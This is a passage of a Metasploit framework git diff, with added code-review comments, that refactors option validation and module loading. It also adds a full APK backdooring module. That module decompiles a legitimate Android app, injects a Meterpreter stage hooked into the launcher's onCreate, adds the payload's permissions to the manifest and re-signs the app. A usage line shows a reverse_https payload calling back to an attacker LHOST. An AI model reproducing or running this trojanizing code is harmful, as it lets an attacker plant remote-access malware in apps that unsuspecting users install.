datastore['SessionRetryWait'].to_i, + :ssl => ssl?, + :payload_uuid => uuid + }) + rescue NoMethodError + print_error("Staging failed. 
This can occur when stageless listeners are used with staged payloads.") + return + end when :connect - print_status("#{cli.peerhost}:#{cli.peerport} (UUID: #{uuid.to_s}) Attaching orphaned/stageless session ...") + print_status("Attaching orphaned/stageless session ...") resp.body = '' conn_id = req.relative_resource @@ -376,7 +390,7 @@ protected else unless [:unknown_uuid, :unknown_uuid_url].include?(info[:mode]) - print_status("#{cli.peerhost}:#{cli.peerport} Unknown request to #{request_summary}") + print_status("Unknown request to #{request_summary}") end resp.code = 200 resp.message = 'OK' diff --git a/lib/msf/core/module.rb b/lib/msf/core/module.rb index fda6eebe8c..fe39a459b3 100644 --- a/lib/msf/core/module.rb +++ b/lib/msf/core/module.rb @@ -266,11 +266,10 @@ class Module end # - # Returns true if this module is being debugged. The debug flag is set - # by setting datastore['DEBUG'] to 1|true|yes + # Returns true if this module is being debugged. # def debugging? - (datastore['DEBUG'] || '') =~ /^(1|t|y)/i + datastore['DEBUG'] end # diff --git a/lib/msf/core/module/deprecated.rb b/lib/msf/core/module/deprecated.rb index 2879223d2f..64c846058b 100644 --- a/lib/msf/core/module/deprecated.rb +++ b/lib/msf/core/module/deprecated.rb 
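Review bot: `rescue NoMethodError` around the `:init_native` staging block also covers `encode_stage` and `create_session`, so any unrelated nil dereference in those calls is reported as `Staging failed...` and its backtrace is lost. If the case being handled is a payload object without `stage_payload`, test for it directly before staging with `unless obj.respond_to?(:stage_payload)`, and let real errors propagate or be logged with their message. The bare `return` also leaves `on_request` before whatever response handling follows the `case` (outside this hunk), so confirm the client connection is still answered or closed.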
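Review bot: `debugging?` now returns `datastore['DEBUG']` as-is, where the removed code matched the string forms `1|t|y`; in Ruby every String is truthy, including `"false"` and `"0"`. This is only safe if DEBUG is always registered as a boolean option and normalized by the datastore, which this hunk does not show. The same applies to `TimestampOutput` in `print_prefix` in lib/msf/core/module/ui/message.rb, in particular the `framework.datastore['TimestampOutput']` branch. A short comment stating the expectation, e.g. `# DEBUG must be a boolean option; a raw string such as "false" would be truthy here`, would make the assumption visible.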
@@ -60,15 +60,15 @@ module Msf::Module::Deprecated # # @return [void] def print_deprecation_warning - print_warning("*"*72) - print_warning("*%red"+"The module #{refname} is deprecated!".center(70)+"%clr*") + print_warning("*"*90) + print_warning("*%red"+"The module #{refname} is deprecated!".center(88)+"%clr*") if deprecation_date - print_warning("*"+"It will be removed on or about #{deprecation_date}".center(70)+"*") + print_warning("*"+"It will be removed on or about #{deprecation_date}".center(88)+"*") end if replacement_module - print_warning("*"+"Use #{replacement_module} instead".center(70)+"*") + print_warning("*"+"Use #{replacement_module} instead".center(88)+"*") end - print_warning("*"*72) + print_warning("*"*90) end def init_ui(input = nil, output = nil) diff --git a/lib/msf/core/module/ui/message.rb b/lib/msf/core/module/ui/message.rb index 7370ded212..c706a35702 100644 --- a/lib/msf/core/module/ui/message.rb +++ b/lib/msf/core/module/ui/message.rb @@ -13,11 +13,10 @@ module Msf::Module::UI::Message end def print_prefix - ret = '' - if (datastore['TimestampOutput'] =~ /^(t|y|1)/i) || ( - framework && framework.datastore['TimestampOutput'] =~ /^(t|y|1)/i - ) - prefix = "[#{Time.now.strftime("%Y.%m.%d-%H:%M:%S")}] " + prefix = '' + if datastore['TimestampOutput'] || + (framework && framework.datastore['TimestampOutput']) + prefix << "[#{Time.now.strftime("%Y.%m.%d-%H:%M:%S")}] " xn ||= datastore['ExploitNumber'] xn ||= framework.datastore['ExploitNumber'] @@ -25,9 +24,8 @@ module Msf::Module::UI::Message prefix << "[%04d] " % xn end - ret = prefix end - ret + prefix end def print_status(msg='') @@ -37,4 +35,4 @@ module Msf::Module::UI::Message def print_warning(msg='') super(print_prefix + msg) end -end \ No newline at end of file +end diff --git a/lib/msf/core/module/ui/message/verbose.rb b/lib/msf/core/module/ui/message/verbose.rb index 1a8d0175b9..a47a7e8f11 100644 --- a/lib/msf/core/module/ui/message/verbose.rb 
+++ b/lib/msf/core/module/ui/message/verbose.rb @@ -1,21 +1,21 @@ module Msf::Module::UI::Message::Verbose # Verbose version of #print_error def vprint_error(msg='') - print_error(msg) if datastore['VERBOSE'] || framework.datastore['VERBOSE'] + print_error(msg) if datastore['VERBOSE'] || (!framework.nil? && framework.datastore['VERBOSE']) end # Verbose version of #print_good def vprint_good(msg='') - print_good(msg) if datastore['VERBOSE'] || framework.datastore['VERBOSE'] + print_good(msg) if datastore['VERBOSE'] || (!framework.nil? && framework.datastore['VERBOSE']) end # Verbose version of #print_status def vprint_status(msg='') - print_status(msg) if datastore['VERBOSE'] || framework.datastore['VERBOSE'] + print_status(msg) if datastore['VERBOSE'] || (!framework.nil? && framework.datastore['VERBOSE']) end # Verbose version of #print_warning def vprint_warning(msg='') - print_warning(msg) if datastore['VERBOSE'] || framework.datastore['VERBOSE'] + print_warning(msg) if datastore['VERBOSE'] || (!framework.nil? && framework.datastore['VERBOSE']) end end diff --git a/lib/msf/core/module_manager.rb b/lib/msf/core/module_manager.rb index c8ebc14c21..0fe7794797 100644 --- a/lib/msf/core/module_manager.rb +++ b/lib/msf/core/module_manager.rb @@ -120,6 +120,7 @@ module Msf self.module_info_by_path = {} self.enablement_by_type = {} self.module_load_error_by_path = {} + self.module_load_warnings = {} self.module_paths = [] self.module_set_by_type = {} @@ -146,11 +147,6 @@ module Msf # @param klass [Class] The module class # @return [void] def auto_subscribe_module(klass) - # If auto-subscribe has been disabled - if (framework.datastore['DisableAutoSubscribe'] and - framework.datastore['DisableAutoSubscribe'] =~ /^(y|1|t)/) - return - end # If auto-subscription is enabled (which it is by default), figure out # if it subscribes to any particular interfaces. 
diff --git a/lib/msf/core/module_manager/loading.rb b/lib/msf/core/module_manager/loading.rb index c5900bd15a..c7bb4a0bb5 100644 --- a/lib/msf/core/module_manager/loading.rb +++ b/lib/msf/core/module_manager/loading.rb @@ -50,7 +50,7 @@ module Msf::ModuleManager::Loading changed end - attr_accessor :module_load_error_by_path + attr_accessor :module_load_error_by_path, :module_load_warnings # Called when a module is initially loaded such that it can be categorized # accordingly. @@ -122,4 +122,4 @@ module Msf::ModuleManager::Loading count_by_type end -end \ No newline at end of file +end diff --git a/lib/msf/core/modules/loader/base.rb b/lib/msf/core/modules/loader/base.rb index 5f4586efd6..3ed5bb8c21 100644 --- a/lib/msf/core/modules/loader/base.rb +++ b/lib/msf/core/modules/loader/base.rb @@ -3,9 +3,7 @@ # Project # require 'msf/core/modules/loader' -require 'msf/core/modules/namespace' -require 'msf/core/modules/metasploit_class_compatibility_error' -require 'msf/core/modules/version_compatibility_error' +require 'msf/core/modules/error' # Responsible for loading modules for {Msf::ModuleManager}. # @@ -30,9 +28,6 @@ class Msf::Modules::Loader::Base # By calling module_eval from inside the module definition, the lexical scope is captured and available to the code in # module_content. NAMESPACE_MODULE_CONTENT = <<-EOS - # ensure the namespace module can respond to checks during loading - extend Msf::Modules::Namespace - class << self # The loader that originally loaded this module # 
@@ -103,12 +98,9 @@ class Msf::Modules::Loader::Base # @option options [Boolean] :reload (false) whether this is a reload. # # @return [false] if :force is false and parent_path has not changed. - # @return [false] if exception encountered while parsing module - # content - # @return [false] if the module is incompatible with the Core or API - # version. - # @return [false] if the module does not implement a Metasploit(\d+) - # class. + # @return [false] if exception encountered while parsing module content + # @return [false] if the module is incompatible with the Core or API version. + # @return [false] if the module does not implement a Metasploit class. # @return [false] if the module's is_usable method returns false. # @return [true] if all those condition pass and the module is # successfully loaded. @@ -131,8 +123,6 @@ class Msf::Modules::Loader::Base reload ||= force || file_changed - metasploit_class = nil - module_content = read_module_content(parent_path, type, module_reference_name) if module_content.empty? @@ -140,6 +130,7 @@ class Msf::Modules::Loader::Base return false end + klass = nil try_eval_module = lambda { |namespace_module| # set the parent_path so that the module can be reloaded with #load_module namespace_module.parent_path = parent_path 
@@ -150,41 +141,24 @@ class Msf::Modules::Loader::Base rescue ::Interrupt raise rescue ::Exception => error - # Hide eval errors when the module version is not compatible - begin - namespace_module.version_compatible!(module_path, module_reference_name) - rescue Msf::Modules::VersionCompatibilityError => version_compatibility_error - load_error(module_path, version_compatibility_error) - else - load_error(module_path, error) - end - - return false - end - - begin - namespace_module.version_compatible!(module_path, module_reference_name) - rescue Msf::Modules::VersionCompatibilityError => version_compatibility_error - load_error(module_path, version_compatibility_error) - - return false - end - - begin - metasploit_class = namespace_module.metasploit_class!(module_path, module_reference_name) - rescue Msf::Modules::MetasploitClassCompatibilityError => error load_error(module_path, error) - return false end - unless usable?(metasploit_class) - ilog( - "Skipping module (#{module_reference_name} from #{module_path}) because is_usable returned false.", - 'core', - LEV_1 - ) - + if namespace_module.const_defined?('Metasploit3', false) + klass = namespace_module.const_get('Metasploit3', false) + load_warning(module_path, 'Please change the modules class name from Metasploit3 to MetasploitModule') + elsif namespace_module.const_defined?('Metasploit4', false) + klass = namespace_module.const_get('Metasploit4', false) + load_warning(module_path, 'Please change the modules class name from Metasploit4 to MetasploitModule') + elsif namespace_module.const_defined?('MetasploitModule', false) + klass = namespace_module.const_get('MetasploitModule', false) + else + load_error(module_path, Msf::Modules::Error.new({ + :module_path => module_path, + :module_reference_name => module_reference_name, + :causal_message => 'Invalid module (no MetasploitModule class or module name)' + })) return false end 
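Review bot: The three `const_defined?`/`const_get` branches differ only in the constant name, and both warning strings are missing the apostrophe in "module's". Looking the name up once, `name = %w[Metasploit3 Metasploit4 MetasploitModule].find { |n| namespace_module.const_defined?(n, false) }`, leaves a single `const_get(name, false)` and a single `load_warning(...) unless name == 'MetasploitModule'`. The value from `const_get` is also passed on without checking that it is a Class, so a file that defines one of these names as some other kind of constant is not rejected here; whether a later step catches it is outside this hunk. The enclosing lambda starts before the hunk.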
@@ -206,7 +180,7 @@ class Msf::Modules::Loader::Base # Do some processing on the loaded module to get it into the right associations module_manager.on_module_load( - metasploit_class, + klass, type, module_reference_name, { @@ -339,9 +313,9 @@ class Msf::Modules::Loader::Base protected - # Returns a nested module to wrap the Metasploit(1|2|3) class so that it doesn't overwrite other (metasploit) - # module's classes. The wrapper module must be named so that active_support's autoloading code doesn't break when - # searching constants from inside the Metasploit(1|2|3) class. + # Returns a nested module to wrap the MetasploitModule class so that it doesn't overwrite other (metasploit) + # module's classes. The wrapper module must be named so that active_support's autoloading code doesn't break when + # searching constants from inside the Metasploit class. # # @param namespace_module_names [Array] # {NAMESPACE_MODULE_NAMES} + @@ -351,7 +325,7 @@ class Msf::Modules::Loader::Base # @see NAMESPACE_MODULE_CONTENT def create_namespace_module(namespace_module_names) # In order to have constants defined in Msf resolve without the Msf qualifier in the module_content, the - # Module.nesting must resolve for the entire nesting. Module.nesting is strictly lexical, and can't be faked with + # Module.nesting must resolve for the entire nesting. Module.nesting is strictly lexical, and can't be faked with # module_eval(&block). (There's actually code in ruby's implementation to stop module_eval from being added to # Module.nesting when using the block syntax.) All this means is the modules have to be declared as a string that # gets module_eval'd. 
@@ -432,13 +406,32 @@ class Msf::Modules::Loader::Base log_lines << "#{module_path} failed to load due to the following error:" log_lines << error.class.to_s log_lines << error.to_s - log_lines << "Call stack:" - log_lines += error.backtrace + if error.backtrace + log_lines << "Call stack:" + log_lines += error.backtrace + end log_message = log_lines.join("\n") elog(log_message) end + # Records the load warning to {Msf::ModuleManager::Loading#module_load_warnings} and the log. + # + # @param [String] module_path Path to the module as returned by {#module_path}. + # @param [String] Error message that caused the warning. + # @return [void] + # + # @see #module_path + def load_warning(module_path, error) + module_manager.module_load_warnings[module_path] = error.to_s + + log_lines = [] + log_lines << "#{module_path} generated a warning during load:" + log_lines << error.to_s + log_message = log_lines.join("\n") + wlog(log_message) + end + # @return [Msf::ModuleManager] The module manager for which this loader is loading modules. attr_reader :module_manager @@ -455,7 +448,7 @@ class Msf::Modules::Loader::Base raise ::NotImplementedError end - # Returns whether the path could refer to a module. The path would still need to be loaded in order to check if it + # Returns whether the path could refer to a module. The path would still need to be loaded in order to check if it # actually is a valid module. # # @param [String] path to module without the type directory. 
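Review bot: The doc comment on the new `load_warning` has `# @param [String] Error message that caused the warning.`, which omits the parameter name, so YARD would take "Error" as the name. It should read `# @param [String] error Message describing the warning.` Both callers visible in this diff pass a plain String, so naming the parameter `message` instead of `error` would also match how it is used.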
@@ -502,8 +495,8 @@ class Msf::Modules::Loader::Base end # Returns an Array of names to make a fully qualified module name to - # wrap the Metasploit(1|2|3) class so that it doesn't overwrite other - # (metasploit) module's classes. Invalid module name characters are + # wrap the MetasploitModule class so that it doesn't overwrite other + # (metasploit) module's classes. Invalid module name characters are # escaped by using 'H*' unpacking and prefixing each code with X so # the code remains a valid module name when it starts with a digit. # @@ -626,28 +619,4 @@ class Msf::Modules::Loader::Base self.class.typed_path(type, module_reference_name) end - # Returns whether the metasploit_class is usable on the current system. Defer's to metasploit_class's #is_usable if - # it is defined. - # - # @param [Msf::Module] metasploit_class As returned by {Msf::Modules::Namespace#metasploit_class} - # @return [false] if metasploit_class.is_usable returns false. - # @return [true] if metasploit_class does not respond to is_usable. - # @return [true] if metasploit_class.is_usable returns true. - def usable?(metasploit_class) - # If the module indicates that it is not usable on this system, then we - # will not try to use it. - usable = false - - if metasploit_class.respond_to? :is_usable - begin - usable = metasploit_class.is_usable - rescue => error - elog("Exception caught during is_usable check: #{error}") - end - else - usable = true - end - - usable - end end diff --git a/lib/msf/core/modules/loader/directory.rb b/lib/msf/core/modules/loader/directory.rb index 46f182e4f6..f311e4b767 100644 --- a/lib/msf/core/modules/loader/directory.rb +++ b/lib/msf/core/modules/loader/directory.rb 
@@ -32,10 +32,6 @@ class Msf::Modules::Loader::Directory < Msf::Modules::Loader::Base def each_module_reference_name(path, opts={}) whitelist = opts[:whitelist] || [] ::Dir.foreach(path) do |entry| - if entry.downcase == '.svn' - next - end - full_entry_path = ::File.join(path, entry) type = entry.singularize diff --git a/lib/msf/core/modules/metasploit_class_compatibility_error.rb b/lib/msf/core/modules/metasploit_class_compatibility_error.rb deleted file mode 100644 index ae829392cf..0000000000 --- a/lib/msf/core/modules/metasploit_class_compatibility_error.rb +++ /dev/null @@ -1,14 +0,0 @@ -# -*- coding: binary -*- -require 'msf/core/modules/error' - -# Error raised by {Msf::Modules::Namespace#metasploit_class!} if it cannot the namespace_module does not have a constant -# with {Msf::Framework::Major} or lower as a number after 'Metasploit', which indicates a compatible Msf::Module. -class Msf::Modules::MetasploitClassCompatibilityError < Msf::Modules::Error - def initialize(attributes={}) - super_attributes = { - :causal_message => 'Missing compatible Metasploit class constant', - }.merge(attributes) - - super(super_attributes) - end -end \ No newline at end of file diff --git a/lib/msf/core/modules/namespace.rb b/lib/msf/core/modules/namespace.rb deleted file mode 100644 index fa65f5fa26..0000000000 --- a/lib/msf/core/modules/namespace.rb +++ /dev/null 
@@ -1,76 +0,0 @@ -# -*- coding: binary -*- -require 'metasploit/framework/api/version' -require 'metasploit/framework/core/version' - -# Concern for behavior that all namespace modules that wrap Msf::Modules must support like version checking and -# grabbing the version specific-Metasploit* class. -module Msf::Modules::Namespace - # Returns the Metasploit(3|2|1) class from the module_evalled content. - # - # @note The module content must be module_evalled into this namespace module before the return of - # {#metasploit_class} is valid. - # - # @return [Msf::Module] if a Metasploit(3|2|1) class exists in this module - # @return [nil] if such as class is not defined. - def metasploit_class - metasploit_class = nil - - ::Msf::Framework::Major.downto(1) do |major| - # Since we really only care about the deepest namespace, we don't - # need to look for parents' constants. However, the "inherit" - # parameter for const_defined? only exists after 1.9. If we ever - # drop 1.8 support, we can save a few cycles here by passing false - # here. - if const_defined?("Metasploit#{major}") - metasploit_class = const_get("Metasploit#{major}") - - break - end - end - - metasploit_class - end - - def metasploit_class!(module_path, module_reference_name) - metasploit_class = self.metasploit_class - - unless metasploit_class - raise Msf::Modules::MetasploitClassCompatibilityError.new( - :module_path => module_path, - :module_reference_name => module_reference_name - ) - end - - metasploit_class - end - - # Raises an error unless {Msf::Framework::VersionCore} and {Msf::Framework::VersionAPI} meet the minimum required - # versions defined in RequiredVersions in the module content. - # - # @note The module content must be module_evalled into this namespace module using module_eval_with_lexical_scope - # before calling {#version_compatible!} is valid. - # - # @param [String] module_path Path from where the module was read. 
- # @param [String] module_reference_name The canonical name for the module. - # @raise [Msf::Modules::VersionCompatibilityError] if RequiredVersion[0] > Msf::Framework::VersionCore or - # RequiredVersion[1] > Msf::Framework::VersionApi - # @return [void] - def version_compatible!(module_path, module_reference_name) - if const_defined?(:RequiredVersions) - required_versions = const_get(:RequiredVersions) - minimum_core_version = Gem::Version.new(required_versions[0].to_s) - minimum_api_version = Gem::Version.new(required_versions[1].to_s) - - if (minimum_core_version > Metasploit::Framework::Core::GEM_VERSION || - minimum_api_version > Metasploit::Framework::API::GEM_VERSION) - raise Msf::Modules::VersionCompatibilityError.new( - :module_path => module_path, - :module_reference_name => module_reference_name, - :minimum_api_version => minimum_api_version, - :minimum_core_version => minimum_core_version - ) - end - end - end -end - diff --git a/lib/msf/core/modules/version_compatibility_error.rb b/lib/msf/core/modules/version_compatibility_error.rb deleted file mode 100644 index fb52be3fc8..0000000000 --- a/lib/msf/core/modules/version_compatibility_error.rb +++ /dev/null 
@@ -1,52 +0,0 @@ -# -*- coding: binary -*- -require 'msf/core/modules/error' - -# Error raised by {Msf::Modules::Namespace#version_compatible!} on {Msf::Modules::Loader::Base#create_namespace_module} -# if the API or Core version does not meet the minimum requirements defined in the RequiredVersions constant in the -# {Msf::Modules::Loader::Base#read_module_content module content}. -class Msf::Modules::VersionCompatibilityError < Msf::Modules::Error - # @param [Hash{Symbol => Float}] attributes - # @option attributes [Float] :minimum_api_version The minimum {Msf::Framework::VersionAPI} as defined in - # RequiredVersions. - # @option attributes [Float] :minimum_core_version The minimum {Msf::Framework::VersionCore} as defined in - # RequiredVersions. - def initialize(attributes={}) - @minimum_api_version = attributes[:minimum_api_version] - @minimum_core_version = attributes[:minimum_core_version] - - message_parts = [] - message_parts << 'version check' - - if minimum_api_version or minimum_core_version - clause_parts = [] - - if minimum_api_version - clause_parts << "API >= #{minimum_api_version}" - end - - if minimum_core_version - clause_parts << "Core >= #{minimum_core_version}" - end - - clause = clause_parts.join(' and ') - message_parts << "(requires #{clause})" - end - - causal_message = message_parts.join(' ') - - super_attributes = { - :causal_message => causal_message - }.merge(attributes) - - super(super_attributes) - end - - # @return [Float] The minimum value of {Msf::Framework::VersionAPI} for the module to be compatible. - attr_reader :minimum_api_version - # @return [Float] The minimum value of {Msf::Framework::VersionCore} for the module to be compatible. - attr_reader :minimum_core_version - # @return [String] the path to the module that declared the RequiredVersions - attr_reader :module_path - # @return [String] the module reference name that declared the RequiredVersions - attr_reader :module_reference_name -end \ No newline at end of file 
diff --git a/lib/msf/core/opt.rb b/lib/msf/core/opt.rb index 3df70e099a..a1a53a2c87 100644 --- a/lib/msf/core/opt.rb +++ b/lib/msf/core/opt.rb @@ -51,6 +51,13 @@ module Msf Msf::OptPort.new(__method__.to_s, [ required, desc, default ]) end + # @return [OptEnum] + def self.SSLVersion + Msf::OptEnum.new('SSLVersion', [ false, + 'Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate)', 'Auto', + ['Auto', 'SSL2', 'SSL3', 'SSL23', 'TLS', 'TLS1', 'TLS1.1', 'TLS1.2']]) + end + # These are unused but remain for historical reasons class << self alias builtin_chost CHOST @@ -69,6 +76,7 @@ module Msf Proxies = Proxies() RHOST = RHOST() RPORT = RPORT() + SSLVersion = SSLVersion() end end diff --git a/lib/msf/core/opt_address_range.rb b/lib/msf/core/opt_address_range.rb index 50c1653971..13dbe4bcd1 100644 --- a/lib/msf/core/opt_address_range.rb +++ b/lib/msf/core/opt_address_range.rb @@ -12,6 +12,10 @@ class OptAddressRange < OptBase return 'addressrange' end + def validate_on_assignment? + false + end + def normalize(value) return nil unless value.kind_of?(String) if (value =~ /^file:(.*)/) diff --git a/lib/msf/core/opt_base.rb b/lib/msf/core/opt_base.rb index 566f53703f..b332788bc5 100644 --- a/lib/msf/core/opt_base.rb +++ b/lib/msf/core/opt_base.rb @@ -75,6 +75,13 @@ module Msf return (type == in_type) end + # + # Returns true if this option can be validated on assignment + # + def validate_on_assignment? + true + end + # # If it's required and the value is nil or empty, then it's not valid. # diff --git a/lib/msf/core/opt_path.rb b/lib/msf/core/opt_path.rb index 6a40d48fef..23a23a1671 100644 --- a/lib/msf/core/opt_path.rb +++ b/lib/msf/core/opt_path.rb @@ -12,6 +12,10 @@ class OptPath < OptBase return 'path' end + def validate_on_assignment? + false + end + # Generally, 'value' should be a file that exists. def valid?(value) return false if empty_required_value?(value) 
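Review bot: The new `SSLVersion` option offers `SSL2` and `SSL3` next to the TLS values, and neither the description nor the doc comment says that these are obsolete protocol versions; the doc comment is only `@return [OptEnum]`. I would add a summary line such as `# Option selecting the SSL/TLS protocol version; SSL2 and SSL3 are obsolete and kept only for reaching legacy services.` Whether the OpenSSL build in use still accepts those two values is not visible in this hunk, so a module that sets them may fail at connect time rather than at validation.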
diff --git a/lib/msf/core/opt_port.rb b/lib/msf/core/opt_port.rb index 295ae04538..97fb9db7ec 100644 --- a/lib/msf/core/opt_port.rb +++ b/lib/msf/core/opt_port.rb @@ -7,24 +7,17 @@ module Msf # Network port option. # ### -class OptPort < OptBase +class OptPort < OptInt def type return 'port' end - def normalize(value) - value.to_i - end - def valid?(value) - return false if empty_required_value?(value) - - if ((value != nil and value.to_s.empty? == false) and - ((value.to_s.match(/^\d+$/) == nil or value.to_i < 0 or value.to_i > 65535))) - return false + if !required? and value.to_s.empty? + super + else + super && normalize(value) <= 65535 && normalize(value) >= 0 end - - return super end end diff --git a/lib/msf/core/opt_raw.rb b/lib/msf/core/opt_raw.rb index 7da13693d9..b144334165 100644 --- a/lib/msf/core/opt_raw.rb +++ b/lib/msf/core/opt_raw.rb @@ -12,8 +12,12 @@ class OptRaw < OptBase return 'raw' end + def validate_on_assignment? + false + end + def normalize(value) - if (value =~ /^file:(.*)/) + if (value.to_s =~ /^file:(.*)/) path = $1 begin value = File.read(path) diff --git a/lib/msf/core/opt_regexp.rb b/lib/msf/core/opt_regexp.rb index d7056dd63b..bb743077db 100644 --- a/lib/msf/core/opt_regexp.rb +++ b/lib/msf/core/opt_regexp.rb @@ -29,7 +29,7 @@ class OptRegexp < OptBase def normalize(value) return nil if value.nil? - return Regexp.compile(value) + return Regexp.compile(value.to_s) end def display_value(value) diff --git a/lib/msf/core/opt_string.rb b/lib/msf/core/opt_string.rb index 88818cb036..459ac08cc6 100644 --- a/lib/msf/core/opt_string.rb +++ b/lib/msf/core/opt_string.rb @@ -12,8 +12,12 @@ class OptString < OptBase return 'string' end + def validate_on_assignment? + false + end + def normalize(value) - if (value =~ /^file:(.*)/) + if (value.to_s =~ /^file:(.*)/) path = $1 begin value = File.read(path) diff --git a/lib/msf/core/payload/apk.rb b/lib/msf/core/payload/apk.rb new file mode 100644 index 0000000000..7aa9c34bb6 --- /dev/null 
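Review bot: In the new `OptPort#valid?`, `normalize(value)` is evaluated twice and compared with `<=`/`>=`, but `OptInt#normalize` is not part of this diff; if it can return nil for a value that `OptInt#valid?` accepts, the comparison raises NoMethodError instead of returning false. `super && (0..65535).cover?(normalize(value))` does the range check once and yields false for nil. The `and` in the first condition should be `&&` to avoid the precedence difference.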
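Review bot: The changed line `if (value.to_s =~ /^file:(.*)/)` in `OptRaw#normalize` anchors with `^`, which in Ruby matches at the start of any line, so a multi-line value whose second or later line begins with `file:` is treated as a file reference and replaced by the result of `File.read(path)`. Anchoring to the start of the string, `if (value.to_s =~ /\Afile:(.*)/)`, limits the file lookup to values that actually start with the prefix. The same line is changed in the same way in the `opt_string.rb` hunk that follows. In both files the `begin`/`File.read` body continues outside the hunk.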
+++ b/lib/msf/core/payload/apk.rb 
@@ -0,0 +1,206 @@ +# -*- coding: binary -*- + +require 'msf/core' +require 'rex/text' +require 'tmpdir' +require 'nokogiri' +require 'fileutils' +require 'optparse' +require 'open3' + +module Msf::Payload::Apk + + class ApkBackdoor + include Msf::Payload::Apk + def backdoor_apk(apk, payload) + backdoor_payload(apk, payload) + end + end + + def print_status(msg='') + $stderr.puts "[*] #{msg}" + end + + def print_error(msg='') + $stderr.puts "[-] #{msg}" + end + + def usage + print_error "Usage: #{$0} -x [target.apk] [msfvenom options]\n" + print_error "e.g. #{$0} -x messenger.apk -p android/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=8443\n" + end + + def run_cmd(cmd) + begin + stdin, stdout, stderr = Open3.popen3(cmd) + return stdout.read + stderr.read + rescue Errno::ENOENT + return nil + end + end + + # Find the activity that is opened when you click the app icon + def find_launcher_activity(amanifest) + package = amanifest.xpath("//manifest").first['package'] + activities = amanifest.xpath("//activity|//activity-alias") + for activity in activities + activityname = activity.attribute("targetActivity") + unless activityname + activityname = activity.attribute("name") + end + category = activity.search('category') + unless category + next + end + for cat in category + categoryname = cat.attribute('name') + if (categoryname.to_s == 'android.intent.category.LAUNCHER' || categoryname.to_s == 'android.intent.action.MAIN') + name = activityname.to_s + if name.start_with?('.') + name = package + name + end + return name + end + end + end + end + + def fix_manifest(tempdir) + payload_permissions=[] + + #Load payload's permissions + File.open("#{tempdir}/payload/AndroidManifest.xml","rb"){|file| + k=File.read(file) + payload_manifest=Nokogiri::XML(k) + permissions = payload_manifest.xpath("//manifest/uses-permission") + for permission in permissions + name=permission.attribute("name") + payload_permissions << name.to_s + end + } + + original_permissions=[] + 
apk_mani="" + + #Load original apk's permissions + File.open("#{tempdir}/original/AndroidManifest.xml","rb"){|file2| + k=File.read(file2) + apk_mani=k + original_manifest=Nokogiri::XML(k) + permissions = original_manifest.xpath("//manifest/uses-permission") + for permission in permissions + name=permission.attribute("name") + original_permissions << name.to_s + end + } + + #Get permissions that are not in original APK + add_permissions=[] + for permission in payload_permissions + if !(original_permissions.include? permission) + print_status("Adding #{permission}") + add_permissions << permission + end + end + + inject=0 + new_mani="" + #Inject permissions in original APK's manifest + for line in apk_mani.split("\n") + if (line.include? "uses-permission" and inject==0) + for permission in add_permissions + new_mani << ''+"\n" + end + new_mani << line+"\n" + inject=1 + else + new_mani << line+"\n" + end + end + File.open("#{tempdir}/original/AndroidManifest.xml", "wb") {|file| file.puts new_mani } + end + + def backdoor_payload(apkfile, raw_payload) + unless apkfile && File.readable?(apkfile) + usage + raise RuntimeError, "Invalid template: #{apkfile}" + end + + jarsigner = run_cmd("jarsigner") + unless jarsigner != nil + raise RuntimeError, "jarsigner not found. If it's not in your PATH, please add it." + end + + apktool = run_cmd("apktool -version") + unless apktool != nil + raise RuntimeError, "apktool not found. If it's not in your PATH, please add it." + end + + apk_v = Gem::Version.new(apktool) + unless apk_v >= Gem::Version.new('2.0.1') + raise RuntimeError, "apktool version #{apk_v} not supported, please download at least version 2.0.1." 
+ end + + #Create temporary directory where work will be done + tempdir = Dir.mktmpdir + + File.open("#{tempdir}/payload.apk", "wb") {|file| file.puts raw_payload } + FileUtils.cp apkfile, "#{tempdir}/original.apk" + + print_status "Decompiling original APK..\n" + run_cmd("apktool d #{tempdir}/original.apk -o #{tempdir}/original") + print_status "Decompiling payload APK..\n" + run_cmd("apktool d #{tempdir}/payload.apk -o #{tempdir}/payload") + + f = File.open("#{tempdir}/original/AndroidManifest.xml") + amanifest = Nokogiri::XML(f) + f.close + + print_status "Locating hook point..\n" + launcheractivity = find_launcher_activity(amanifest) + unless launcheractivity + raise RuntimeError, "Unable to find hookable activity in #{apkfile}\n" + end + smalifile = "#{tempdir}/original/smali*/" + launcheractivity.gsub(/\./, "/") + ".smali" + smalifiles = Dir.glob(smalifile) + for smalifile in smalifiles + if File.readable?(smalifile) + activitysmali = File.read(smalifile) + end + end + + unless activitysmali + raise RuntimeError, "Unable to find hook point in #{smalifiles}\n" + end + + entrypoint = ';->onCreate(Landroid/os/Bundle;)V' + unless activitysmali.include? 
entrypoint + raise RuntimeError, "Unable to find onCreate() in #{smalifile}\n" + end + + print_status "Copying payload files..\n" + FileUtils.mkdir_p("#{tempdir}/original/smali/com/metasploit/stage/") + FileUtils.cp Dir.glob("#{tempdir}/payload/smali/com/metasploit/stage/Payload*.smali"), "#{tempdir}/original/smali/com/metasploit/stage/" + + payloadhook = entrypoint + "\n invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V" + hookedsmali = activitysmali.gsub(entrypoint, payloadhook) + + print_status "Loading #{smalifile} and injecting payload..\n" + File.open(smalifile, "wb") {|file| file.puts hookedsmali } + injected_apk = "#{tempdir}/output.apk" + print_status "Poisoning the manifest with meterpreter permissions..\n" + fix_manifest(tempdir) + + print_status "Rebuilding #{apkfile} with meterpreter injection as #{injected_apk}\n" + run_cmd("apktool b -o #{injected_apk} #{tempdir}/original") + print_status "Signing #{injected_apk}\n" + run_cmd("jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA #{injected_apk} androiddebugkey") + + outputapk = File.read(injected_apk) + + FileUtils.remove_entry tempdir + outputapk + end +end + + diff --git a/lib/msf/core/payload/ruby.rb b/lib/msf/core/payload/ruby.rb index 80ff558804..e884fa1aca 100644 --- a/lib/msf/core/payload/ruby.rb +++ b/lib/msf/core/payload/ruby.rb @@ -10,7 +10,7 @@ module Msf::Payload::Ruby [ # Since space restrictions aren't really a problem, default this to # true. - Msf::OptBool.new('PrependFork', [ false, "Start the payload in its own process via fork or popen", "true" ]) + Msf::OptBool.new('PrependFork', [ false, "Start the payload in its own process via fork or popen", true ]) ] ) end diff --git a/lib/msf/core/payload/windows/prepend_migrate.rb b/lib/msf/core/payload/windows/prepend_migrate.rb index 58ad420cfe..b6ccf75131 100644 --- a/lib/msf/core/payload/windows/prepend_migrate.rb 
